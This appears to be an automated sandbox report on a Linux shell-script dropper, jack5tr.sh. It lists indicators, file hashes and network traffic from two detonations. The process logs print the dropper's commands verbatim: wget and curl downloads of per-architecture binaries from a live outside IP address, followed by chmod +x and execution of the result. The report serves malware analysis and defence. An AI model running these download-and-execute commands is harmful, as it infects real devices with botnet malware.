Analysis Overview
SHA256
7c437f0cde14f1837f25bfcd49c486da5a1d6c749d55749ae1a5ab26ee4d4e7a
Threat Level: Shows suspicious behavior
The file jack5tr.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
cURL User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-29 19:31
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
debian9-mipsbe-20240611-en
Max time kernel
34s
Max time network
35s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
180s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x config-err-iEKf7O jack5tr.sh netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN sh4 snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| GB | 89.187.167.5:443 | tcp | |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.98:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | daisy.ubuntu.com | udp |
Files
/tmp/x86
